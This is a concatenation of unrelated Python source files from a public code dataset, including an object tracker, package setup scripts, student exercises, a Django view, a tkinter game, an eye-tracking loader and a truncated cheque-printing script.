4.正样本缓冲区存储阈值\n \n \"\"\"\n\n # if self.feature_net_arch == \"resnet18\":\n # threshold1 = 0.4\n # threshold2 = 0.4\n # threshold3 = 0.65\n # threshold4 = 0.2\n # else:\n # threshold1 = 0.7\n # threshold2 = 0.3\n # threshold3 = 0.4\n # threshold4 = 0.2\n\n threshold1 = self.threshold1\n threshold2 = self.threshold2\n threshold3 = self.threshold3\n threshold4 = self.threshold4\n\n # 检测到目标的时候才进行计算特征距离\n if len(sub_canvases) > 0:\n features = self.extractor.extract(sub_canvases).cpu().detach().numpy()\n # distances_list (原始正样本距离,正样本缓冲区加权距离)\n distances_list = self.compute_distance(features)\n\n positive_feature0_nearest_distance = numpy.min(distances_list[0])\n positive_feature0_offset = numpy.argmin(distances_list[0], axis=0)\n\n # 原始正样本距离小于threshold1,视为直接匹配成功,追踪最小距离目标并把该目标的特征加入缓冲区\n if positive_feature0_nearest_distance < threshold1:\n current_target_img_feature = features[positive_feature0_offset][None]\n # 原始正样本的距离小于threshold2时,把该目标的特征加入正样本缓冲区\n if positive_feature0_nearest_distance < threshold2:\n self.positive_feature_buffer = numpy.concatenate(\n (self.positive_feature_buffer, current_target_img_feature), axis=0)\n if len(self.positive_feature_buffer) > self.positive_feature_buffer_maximum:\n self.positive_feature_buffer = self.positive_feature_buffer[\n 1: self.positive_feature_buffer_maximum + 1]\n plot_one_box(boxes[positive_feature0_offset], canvas, color=[0, 0, 255])\n\n # 原始正样本距离大于threshold1,需要计算正样本缓冲区的距离\n else:\n positive_feature_buffer_nearest_distance = numpy.min(distances_list[1])\n positive_feature_buffer_offset = numpy.argmin(distances_list[1], axis=0)\n\n # 正样本缓冲区的距离小于threshold3时,追踪最小距离目标\n if positive_feature_buffer_nearest_distance < threshold3:\n current_target_img_feature = features[positive_feature_buffer_offset][None]\n # 正样本缓冲区的距离小于threshold4时,把该目标的特征加入正样本缓冲区\n if positive_feature_buffer_nearest_distance < threshold4:\n self.positive_feature_buffer = numpy.concatenate(\n (self.positive_feature_buffer, current_target_img_feature), axis=0)\n if len(self.positive_feature_buffer) > self.positive_feature_buffer_maximum:\n self.positive_feature_buffer = self.positive_feature_buffer[\n 1: self.positive_feature_buffer_maximum + 1]\n plot_one_box(boxes[positive_feature_buffer_offset], canvas, color=[0, 0, 255])\n\n out.write(canvas)\n\n toc = time.time()\n\n ret, frame = cap.read()\n current_frame += 1\n\n print(\n \"完成{:.2%} {}s toc - tic = {:.2}s\".format(current_frame / ending_frame, int(current_frame / input_fps),\n toc - tic))\n\n cap.release()\n out.release()\n print()\n","repo_name":"feihongyu/track","sub_path":"yolo-feature-track-v1.00/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26473705793","text":"from setuptools import setup\n\nwith open('README.md') as readme_file:\n README = readme_file.read()\n\nsetup(\n name='cisco-anyconnect-cli',\n packages=['cisco_anyconnect_cli'],\n version='0.6',\n license='apache-2.0',\n description='Cisco AnyConnect command line interface',\n author='Juergen Schmid',\n url='https://github.com/hacki11/cisco-anyconnect-cli',\n keywords=['vpn', 'cisco', 'anyconnect', 'cli'],\n install_requires=[\n 'click',\n 'keepasshttp'\n ],\n entry_points={\n 'console_scripts': ['anyconnect=cisco_anyconnect_cli.cli:main'],\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n 'Operating System :: Microsoft :: Windows'\n ],\n)\n","repo_name":"hacki11/cisco-anyconnect-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"9915938040","text":"# A8Q4\nimport sys\nsys.setrecursionlimit (30000)\nimport math\n\nn = eval(input(\"Enter the starting point N:\\n\"))\nm = eval(input(\"Enter the ending point M:\\n\"))\nindex = 0\nprimeIndex = 2\n\ndef isPrime(i):\n global primeIndex\n if i == 2:\n return True\n if i % primeIndex == 0 or i == 1:\n return False\n primeIndex += 1\n if primeIndex <= math.ceil(math.sqrt(i)):\n return isPrime(i)\n return True\n\n\ndef isPalindrome(s, index):\n \n if len(s) == 1:\n return True\n if (index >(len(s)//2)-1):\n return True\n else:\n if s[index] == s[len(s) - 1 - index]:\n return isPalindrome(s, index+1)\n else: \n return False\n \n\ndef main():\n global n\n \n global primeIndex\n primeIndex = 2\n \n \n if isPrime(n) == True:\n if isPalindrome(str(n), 0) == True:\n print(n)\n n+=1\n if n<=m:\n main()\nprint(\"The palindromic primes are:\")\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/chnjea007/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5553740042","text":"valores=[]\nfor i in range(10):\n valor=int(input(f\"ingrese el valor {i+1}: \"))\n valores.append(valor)\n continue\nprint(valores)\npromedioValores=sum(valores)/len(valores)\nordenAsc=sorted(valores)\nordenDesc=sorted(valores, reverse=True)\nprint(promedioValores)\nprint(ordenAsc)\nprint(ordenDesc)","repo_name":"RolandoHRGt/actGit_proyectoDos_201213994","sub_path":"PROBLEMA6.py","file_name":"PROBLEMA6.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30066499383","text":"def character_n_gram(s,n):\n l=s.replace(\" \",\"\")\n res=[l[i:i+n]for i in range(len(l)-n+1)]\n return res\ns=\"paraparaparadise\"\nt=\"paragraph\"\nx=set(character_n_gram(s,2))\ny=set(character_n_gram(t,2))\n\n#union\nprint(x|y)\n#intersection\nprint(x^y)\n#subtraction\nprint(x-y)\n\nif \"se\" in x:\n print(\"se in x\")\nelse:\n print(\"se not in x\")\nif \"se\" in y:\n print(\"se in y\")\nelse:\n print(\"se not in y\")","repo_name":"Valkyrja3607/NLP100_2020","sub_path":"06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37888524493","text":"#!/usr/bin/python\n# Given a XML file, replace 'bad' XML traits\n# \ti.e. XML file came with hyperlinks on separate lines, remove them\n#\t\treplace '&' with '&'\n\nold_file = open(\"trucks.xml\", \"r\")\nnew_file = open(\"trucks_.xml\", \"w\")\n\nflagHeader = True\nfor line in old_file:\n\tif line.find(\"http:\") == 0:\n\t\tcontinue # remove hyperlinks that are their own contents!\n\tnewline = line.replace(\"&\", \"&\")\n\tnew_file.write(newline)\n\t\nnew_file.close()\nold_file.close()","repo_name":"ahsu1230/Uber_challenge","sub_path":"helper_tools/parseBadXML.py","file_name":"parseBadXML.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26913394428","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport json\nfrom pymongo import MongoClient\n\n\n#@csrf_exempt\ndef empresa_view(request):\n \n print(request)\n if request.method == 'POST':\n \t\n try:\n data = json.loads(request.body)\n \n user_email = data['user_email']\n\n print(data)\n \n client = MongoClient('mongodb://localhost:27017/')\n db = client['mydatabase']\n \n # Insert the user data into the 'users' collection\n # users = db['Empresas']\n # users.insert_one(data)\n # print(user_email)\n \n users = db['users']\n # doc = users.find({'user_info.email': user_email})\n # for c in doc:\n # print(c['user_info'])\n users.update_one({'user_info.email': user_email}, {'$set': {'empresa_details': data}})\n \n return JsonResponse({'status': 'success'})\n except Exception as e:\n return JsonResponse({'status': 'error', 'message': str(e)})\n else:\n return JsonResponse({'status': 'error', 'message': 'Invalid request method'})\n","repo_name":"PECI-11/projeto","sub_path":"Backend/empresa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11898086118","text":"import tkinter\nfrom random import *\ncanvas = tkinter.Canvas(width=1000, height=200)\ncanvas.pack()\n\n# 1-8: Fruits, 9-16: Vegetables\n\n\ndef load_data(s, data, filetype):\n while len(data) < 9:\n r = randint(1, 16)\n if r not in data:\n data.append(r)\n for j in range(len(data)):\n path = tkinter.PhotoImage(file=f\"Images/91_5/oz_{data[j]}{filetype}\")\n s.append(path)\n\n s.append(None)\n data.append(0)\n fruit_check()\n\n\ndef draw_items(x, y):\n canvas.delete(\"img\")\n for img in sequence:\n canvas.create_image(x, y, image=img, anchor=\"nw\", tags=\"img\")\n x += 100\n\n\ndef draw_shelf():\n for i in range(10):\n canvas.create_line(10 + i*100, 130, 10 + i*100 + 80, 130, fill=\"black\")\n\n\ndef click(coord):\n global sequence, data_collection\n x = coord.x\n pick_index = x // 100\n click_counter()\n\n empty_shelf = sequence.index(None)\n distance = abs(pick_index-empty_shelf)\n if distance <= 2:\n sequence[pick_index], sequence[empty_shelf] = sequence[empty_shelf], sequence[pick_index]\n data_collection[pick_index], data_collection[empty_shelf] = \\\n data_collection[empty_shelf], data_collection[pick_index]\n draw_items(10, 40)\n progress_check()\n\n\ndef click_counter():\n global click_count\n canvas.delete(\"count\")\n click_count += 1\n canvas.create_text(500, 170,\n text=f\"Count: {click_count}\", font=\"Arial 15\", tags=\"count\")\n\n\ndef fruit_check():\n global fruit_count\n for fruit in data_collection:\n if 0 < fruit <= 8:\n fruit_count += 1\n\n\ndef progress_check():\n check_value = 0\n for j in range(fruit_count):\n if 0 < data_collection[j] <= 8:\n check_value += 1\n if check_value == fruit_count and data_collection[-1] == 0:\n win()\n\n\ndef win():\n canvas.destroy()\n end = tkinter.Canvas(width=200, height=200)\n end.pack()\n end.create_text(100, 100, text=\"You won!\", font=\"Arial 30 bold\")\n\n\nsequence = []\ndata_collection = []\nfruit_count, click_count = int(), int()\nload_data(sequence, data_collection, \".png\")\ndraw_items(10, 40)\ndraw_shelf()\nclick_counter()\ncanvas.bind_all(\"\", click)\ncanvas.mainloop()\n","repo_name":"michalspano/.py","sub_path":"src/6-images/91_5.py","file_name":"91_5.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8938445917","text":"#!/usr/bin/env python3\n# This file is part of FES library.\n#\n# FES is free software: you can redistribute it and/or modify\n# it under the terms of the GNU LESSER GENERAL PUBLIC LICENSE as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# FES is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU LESSER GENERAL PUBLIC LICENSE for more details.\n#\n# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE\n# along with FES. If not, see .\n\"\"\"This script is the entry point for building, distributing and installing\nthis module using distutils/setuptools.\"\"\"\nfrom typing import List\nimport os\nimport pathlib\nimport platform\nimport re\nimport subprocess\nimport sys\nimport sysconfig\n\nimport packaging.version\nimport setuptools\nimport setuptools.command.build_ext\nimport setuptools.command.install\nimport setuptools.command.sdist\nimport setuptools.command.test\n\n# Check Python requirement\nMAJOR = sys.version_info[0]\nMINOR = sys.version_info[1]\n\n# Versioning tag\nPATTERN = '#define FES_VERSION'\n\n# Working directory\nWORKING_DIRECTORY = pathlib.Path(__file__).parent.absolute()\n\n\ndef build_dirname(extname=None):\n \"\"\"Returns the name of the build directory\"\"\"\n extname = '' if extname is None else os.sep.join(extname.split('.')[:-1])\n if packaging.version.parse(\n setuptools.__version__) >= packaging.version.parse('62.1'):\n return pathlib.Path(\n WORKING_DIRECTORY, 'build', f'lib.{sysconfig.get_platform()}-'\n f'{sys.implementation.cache_tag}', extname)\n return pathlib.Path(WORKING_DIRECTORY, 'build',\n f'lib.{sysconfig.get_platform()}-{MAJOR}.{MINOR}',\n extname)\n\n\ndef execute(cmd):\n \"\"\"Executes a command and returns the lines displayed on the standard\n output\"\"\"\n process = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stream = process.stdout\n assert stream is not None\n return stream.read().decode()\n\n\ndef update_version(path, version, pattern, replaced_line):\n \"\"\"Updating the version number description\"\"\"\n with open(path) as stream:\n lines = stream.readlines()\n pattern = re.compile(pattern)\n\n for idx, line in enumerate(lines):\n match = pattern.search(line)\n if match is not None:\n lines[idx] = replaced_line % version\n\n with open(path, 'w') as stream:\n stream.write(''.join(lines))\n\n\ndef update_meta(path, version):\n \"\"\"Updating the version number description in conda/meta.yaml.\"\"\"\n update_version(path, version, r'{% set version = \".*\" %}',\n '{%% set version = \"%s\" %%}\\n')\n\n\ndef update_python_module(path, version):\n \"\"\"Updating the version number in the python module.\"\"\"\n update_version(path, version, r'm\\.attr\\(\"__version__\"\\) = \"([\\d\\.]+)\";',\n 'm.attr(\"__version__\") = \"%s\";\\n')\n\n\ndef revision():\n \"\"\"Returns the software version.\"\"\"\n os.chdir(WORKING_DIRECTORY)\n path = pathlib.Path(__file__).parent.joinpath('include', 'fes.h')\n\n # If the \".git\" directory exists, this function is executed in the\n # development environment, otherwise it's a release.\n if not pathlib.Path(WORKING_DIRECTORY, '.git').exists():\n pattern = re.compile(PATTERN + r' \"(.*)\"').search\n with open(path) as stream:\n for line in stream:\n match = pattern(line)\n if match is not None:\n return match.group(1)\n raise AssertionError()\n\n stdout = execute('git describe --tags --dirty --long --always').strip()\n pattern = re.compile(r'([\\w\\d\\.]+)-(\\d+)-g[\\w\\d]+(?:-(dirty))?')\n match = pattern.search(stdout)\n if match is None:\n # No tag found, use the last commit\n pattern = re.compile(r'[\\w\\d]+(?:-(dirty))?')\n match = pattern.search(stdout)\n assert match is not None, f'Unable to parse git output {stdout!r}'\n version = '0.0'\n else:\n version = match.group(1)\n commits = int(match.group(2))\n if commits != 0:\n version += f'.dev{commits}'\n\n with open(path) as stream:\n lines = stream.readlines()\n\n for idx, line in enumerate(lines):\n if PATTERN in line:\n lines[idx] = PATTERN + \" \\\"%s\\\"\\n\" % version\n\n with open(path, 'w') as stream:\n stream.writelines(lines)\n\n update_meta(WORKING_DIRECTORY.joinpath('conda', 'meta.yaml'), version)\n update_python_module(WORKING_DIRECTORY.joinpath('python', 'main.cpp'),\n version)\n return version\n\n\nclass CMakeExtension(setuptools.Extension):\n \"\"\"Python extension to build\"\"\"\n\n def __init__(self, name):\n super().__init__(name, sources=[])\n\n\nclass BuildExt(setuptools.command.build_ext.build_ext):\n \"\"\"Build the Python extension using cmake\"\"\"\n user_options = setuptools.command.build_ext.build_ext.user_options\n user_options += [\n ('c-compiler=', None, 'Preferred C compiler'),\n ('cxx-compiler=', None, 'Preferred C++ compiler'),\n ('generator=', None, 'Selected CMake generator'),\n ('netcdf-root=', None, 'Preferred NetCDF installation prefix'),\n ('reconfigure', None, 'Forces CMake to reconfigure this project')\n ]\n\n def initialize_options(self) -> None:\n \"\"\"Set default values for all the options that this command\n supports.\"\"\"\n super().initialize_options()\n self.c_compiler = None\n self.cxx_compiler = None\n self.generator = None\n self.netcdf_root = None\n self.reconfigure = None\n\n def finalize_options(self) -> None:\n \"\"\"Set final values for all the options that this command supports.\"\"\"\n super().finalize_options()\n\n def run(self):\n \"\"\"Carry out the action\"\"\"\n for ext in self.extensions:\n self.build_cmake(ext)\n super().run()\n\n @staticmethod\n def is_conda():\n \"\"\"Detect if the Python interpreter is part of a conda distribution.\"\"\"\n result = pathlib.Path(sys.prefix, 'conda-meta').exists()\n if not result:\n try:\n # pylint: disable=unused-import\n import conda # noqa: F401\n\n # pylint: enable=unused-import\n except ImportError:\n result = False\n else:\n result = True\n return result\n\n def set_cmake_user_options(self):\n \"\"\"Sets the options defined by the user.\"\"\"\n is_conda = self.is_conda()\n result = []\n\n if self.c_compiler is not None:\n result.append('-DCMAKE_C_COMPILER=' + self.c_compiler)\n\n if self.netcdf_root is not None:\n result.append('-DNETCDF_INCLUDE_DIR=' +\n os.path.join(self.netcdf_root, 'include'))\n result.append(\n '-DNETCDF_LIBRARY=' +\n os.path.join(self.netcdf_root, 'lib', 'libnetcdf.so'))\n elif is_conda:\n result.append('-DCMAKE_PREFIX_PATH=' + sys.prefix)\n\n return result\n\n def get_cmake_args(self, cfg: str, extdir: str) -> List[str]:\n \"\"\"build cmake arguments.\n\n # Args:\n * `cfg`: config, one of {\"debug\", \"release\"}\n * `extdir`: output directory.\n \"\"\"\n cmake_args = [\n '-DBUILD_PYTHON=on',\n '-DBUILD_SHARED_LIBS=off',\n '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + str(extdir),\n '-DCMAKE_PREFIX_PATH=' + sys.prefix,\n '-DPython3_EXECUTABLE=' + sys.executable,\n ] + self.set_cmake_user_options()\n\n is_windows = platform.system() == 'Windows'\n\n if self.generator is not None:\n cmake_args.append('-G' + self.generator)\n elif is_windows:\n cmake_args.append('-G' + 'Visual Studio 16 2019')\n\n if is_windows:\n cmake_args += [\n '-DCMAKE_GENERATOR_PLATFORM=x64',\n '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(\n cfg.upper(), extdir),\n ]\n else:\n cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]\n if platform.system() == 'Darwin':\n cmake_args += ['-DCMAKE_OSX_DEPLOYMENT_TARGET=10.14']\n return cmake_args\n\n def get_build_args(self, cfg: str) -> List[str]:\n \"\"\"make compiler build arguments.\n\n # Args:\n * `cfg`: config, one of {\"debug\", \"release\"}\n \"\"\"\n build_args = ['--config', cfg]\n is_windows = platform.system() == 'Windows'\n if is_windows:\n build_args += ['--', '/m']\n else:\n build_args += ['--', '-j%d' % os.cpu_count()]\n\n return build_args\n\n def build_cmake(self, ext):\n \"\"\"execute cmake to build the python extension\"\"\"\n # these dirs will be created in build_py, so if you don't have\n # any python sources to bundle, the dirs will be missing\n build_temp = pathlib.Path(WORKING_DIRECTORY, self.build_temp)\n build_temp.mkdir(parents=True, exist_ok=True)\n extdir = build_dirname(ext.name)\n\n cfg = 'debug' if self.debug else 'release'\n\n os.chdir(str(build_temp))\n\n # Has CMake ever been executed?\n if pathlib.Path(build_temp, 'CMakeFiles',\n 'TargetDirectories.txt').exists():\n # The user must force the reconfiguration\n configure = self.reconfigure is not None\n else:\n configure = True\n\n if configure:\n cmake_args = self.get_cmake_args(cfg, str(extdir))\n self.spawn(['cmake', str(WORKING_DIRECTORY)] + cmake_args)\n if not self.dry_run: # type: ignore\n build_args = self.get_build_args(cfg)\n self.spawn(['cmake', '--build', '.', '--target', 'pyfes'] +\n build_args)\n os.chdir(str(WORKING_DIRECTORY))\n\n\nclass Revision(setuptools.Command):\n \"\"\"Get the current git revision\"\"\"\n\n description = 'get the current git revision'\n user_options = []\n\n def initialize_options(self):\n \"\"\"initialize options\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"finalize options\"\"\"\n pass\n\n def run(self):\n \"\"\"Carry out the action\"\"\"\n print(revision())\n\n\ndef main():\n setuptools.setup(\n name='pyfes',\n version=revision(),\n classifiers=[\n 'Development Status :: 3 - Stable',\n 'Topic :: Scientific/Engineering :: Physics',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Operating System :: MacOS',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n ],\n description='FES2014 prediction software.',\n url='https://github.com/CNES/aviso-fes',\n author='NES/CLS/LEGOS',\n license='GNU General Public License v3 (GPLv3)',\n ext_modules=[CMakeExtension(name='pyfes')],\n setup_requires=[],\n # install_requires=[\"numpy\"],\n # tests_require=[\"netCDF4\", \"numpy\"],\n # package_dir={'': 'src'},\n # packages=setuptools.find_packages(where=\"src\"),\n cmdclass={\n 'build_ext': BuildExt,\n 'revision': Revision\n }, # type: ignore\n zip_safe=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CNES/aviso-fes","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":11899,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"43"} +{"seq_id":"32678925251","text":"\nimport os\nimport glob\nimport numpy as np\nimport os.path as osp\nimport csv\n\n\nclass _ExerciseOculo(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, fname, signal, annotations=None, infos=None):\n self.fname = osp.basename(fname)\n self.signal = np.array(signal).astype(float)\n self.annotations = annotations\n self.infos = infos\n\n\ndef load_eyefant(fname):\n X = []\n delimiter = '\\t'\n full_fname = fname\n with open(full_fname, encoding=\"ISO-8859-1\") as f:\n nb_sig = int(f.readline().replace('Number of signals:', ''))\n for i in range(5):\n f.readline()\n f.readline()\n info = []\n for i in range(nb_sig):\n info.append(f.readline().strip().split(delimiter)[1:])\n f.readline()\n for line in f.readlines():\n line = line.strip().replace(',', '.')\n X.append(line.split(delimiter)[1:])\n\n X = np.array(X)\n try:\n if X.shape[1] == 7:\n X = X[::8, :-1]\n except ValueError:\n pass\n\n if X.shape[1] == 6:\n X = X[:, 2:]\n\n\n return _ExerciseOculo(full_fname, X)\n\n\n","repo_name":"tomMoral/detrending_csc_oculo","sub_path":"src/database/data_Eye.py","file_name":"data_Eye.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"37356039132","text":"# _*_ coding:utf-8 _*_\n__author__ = 'pb'\n__date__ = '2017/3/16 23:55'\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^(?P\\d+)/$', views.product_detail,name='product_detail'),\n url(r'^slablist/(?P\\d+)/$', views.slablist_detail,name='slablist'),\n url(r'^', views.product_list,name='product_list'),\n ]","repo_name":"pbpoon/dj-jxc","sub_path":"apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4579338669","text":"import os\r\nimport subprocess\r\ntry:\r\n from reportlab.pdfgen import canvas\r\nexcept ImportError:\r\n # ReportLab is not installed, install it using pip\r\n print(\"Installing ReportLab...\")\r\n subprocess.run(['pip', 'install', 'reportlab'])\r\n print(\"ReportLab installed successfully.\")\r\n from reportlab.pdfgen import canvas\r\nfrom reportlab.lib.pagesizes import letter\r\nfrom reportlab.lib.units import mm\r\nfrom reportlab.pdfbase import pdfmetrics\r\nfrom reportlab.pdfbase.ttfonts import TTFont\r\n\r\n# define constants\r\nCHEQUE_WIDTH = 215.9 * mm\r\nCHEQUE_HEIGHT = 95.3 * mm\r\nTOP_MARGIN = 10 * mm\r\nLEFT_MARGIN = 15 * mm\r\nRIGHT_MARGIN = 15 * mm\r\nBOTTOM_MARGIN = 15 * mm\r\nMICR_FONT_SIZE = 12\r\nMICR_FONT_PATH = 'GnuMICR.ttf'\r\n\r\n# function to convert number to words\r\ndef convert_number_to_words(num):\r\n ones = [\"\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\"]\r\n tens = [\"\", \"\", \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\r\n teens = [\"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\", \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\r\n words = \"\"\r\n \r\n if num == 0:\r\n return \"zero\"\r\n \r\n if num < 0:\r\n words += \"minus \"\r\n num = abs(num)\r\n \r\n if num >= 1000000:\r\n words += convert_number_to_words(num // 1000000) + \" million \"\r\n num %= 1000000\r\n \r\n if num >= 1000:\r\n words += convert_number_to_words(num // 1000) + \" thousand \"\r\n num %= 1000\r\n \r\n if num >= 100:\r\n words += ones[num // 100] + \" hundred \"\r\n num %= 100\r\n \r\n if num >= 20:\r\n words += tens[num // 10] + \" \"\r\n num %= 10\r\n \r\n if num >= 10 and num <= 19:\r\n words += teens[num - 10] + \" \"\r\n num = 0\r\n \r\n if num > 0:\r\n words += ones[num] + \" \"\r\n \r\n return words.capitalize()\r\n\r\n# function to create the printable file\r\ndef create_cheque():\r\n # get input from user\r\n name = input(\"Enter Your Name: \")\r\n address1 = input(\"Enter Your First Address Line(1/2): \")\r\n address2 = input(\"Enter Your Second Address Line(2/2): \")\r\n bank_name = None\r\n while bank_name not in [\"CIBC\", \"RBC\", \"TD\", \"SCOTIABANK\", \"BMO\"]:\r\n print(\"Select your bank:\")\r\n print(\"1. CIBC\")\r\n print(\"2. RBC\")\r\n print(\"3. TD\")\r\n print(\"4. Scotiabank\")\r\n print(\"5. BMO\")\r\n bank_choice = input(\"Enter your choice (1-5): \")\r\n if bank_choice == \"1\":\r\n bank_name = \"Canadian Imperial Bank of Commerce\"\r\n elif bank_choice == \"2\":\r\n bank_name = \"Royal Bank of Canada\"\r\n elif bank_choice == \"3\":\r\n bank_name = \"TD Canada Trust\"\r\n elif bank_choice == \"4\":\r\n bank_name = \"Scotiabank\"\r\n elif bank_choice == \"5\":\r\n bank_name = \"Bank of Montreal\"\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n bank_address = input(\"Enter Bank Branch Address: \")\r\n date = input(\"Enter Date (YYYY-MM-DD): \")\r\n payee_name = input(\"Enter Payee Name: \")\r\n amount = float(input(\"Enter the amount: \"))\r\n cheque_number = input(\"Enter Cheque Number (3 digits): \")\r\n transit_number = input(\"Enter Transit (Branch) Number: \")\r\n institution_number = input(\"Enter Institution Number: \")\r\n account_number = input(\"Enter Account Number: \")\r\n memo = input(\"Enter Memo: \")\r\n \r\n # convert amount to words\r\n amount_in_words = convert_number_to_words(int(amount))\r\n \r\n # format MICR line\r\n if bank_name.upper() == \"Canadian Imperial Bank of Commerce\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:2],\r\n account_number[2:]\r\n )\r\n elif bank_name.upper() == \"Royal Bank of Canada\":\r\n micr_line = \"C{}C A{}D{}A {}D{}D{}\".format(\r\n cheque_number.zfill(5),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:3],\r\n account_number[3:6],\r\n account_number[6:]\r\n )\r\n elif bank_name.upper() == \"TD Canada Trust\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:4],\r\n account_number[4:]\r\n )\r\n elif bank_name.upper() == \"Scotiabank\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:5],\r\n account_number[5:]\r\n )\r\n elif bank_name.upper() == \"Bank of Montreal\":\r\n micr_line = \"C{}C A{}D{}A {}D{}C\".format(\r\n cheque_number.zfill(3),\r\n transit_number.zfill(5),\r\n institution_number.zfill(3),\r\n account_number[:4],\r\n account_number[4:]\r\n )\r\n\r\n # create file name\r\n file_name = \"{}_{}.pdf\".format(payee_name.lower().replace(\" \", \"\"), date.replace(\"/\", \"\"))\r\n \r\n # create PDF file and write data to it\r\n c = canvas.Canvas(file_name, pagesize=letter)\r\n \r\n # load fonts\r\n pdfmetrics.registerFont(TTFont('GnuMICR', MICR_FONT_PATH))\r\n c.setFont('GnuMICR', MICR_FONT_SIZE)\r\n \r\n # draw MICR line\r\n micr_line_y = CHEQUE_HEIGHT - TOP_MARGIN - 75 * mm\r\n c.drawString(LEFT_MARGIN, micr_line_y, micr_line)\r\n \r\n # load Arial font for other text\r\n pdfmetrics.registerFont(TTFont('Arial', 'arial.ttf'))\r\n pdfmetrics.registerFont(TTFont('Arial_bold', 'arial_bold.ttf'))\r\n c.setFont('Arial_bold', 12)\r\n \r\n # draw cheque elements\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN, name)\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 5 * mm, address1)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 10 * mm, address2)\r\n c.setFont('Arial', 12)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN, cheque_number)\r\n c.setFont('Arial', 10)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 30 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 10 * mm, \"Date: {}\".format(date))\r\n c.setFont('Arial', 12)\r\n c.drawString(CHEQUE_WIDTH / 3, CHEQUE_HEIGHT - TOP_MARGIN - 20 * mm, bank_name)\r\n c.setFont('Arial', 10)\r\n c.drawString(CHEQUE_WIDTH / 3, CHEQUE_HEIGHT - TOP_MARGIN - 25 * mm, bank_address)\r\n c.setFont('Arial', 12)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 35 * mm, \"PAY {} & {}/100 Dollars\".format(amount_in_words, format_amount(amount)))\r\n c.setFont('Arial_bold', 12)\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 45 * 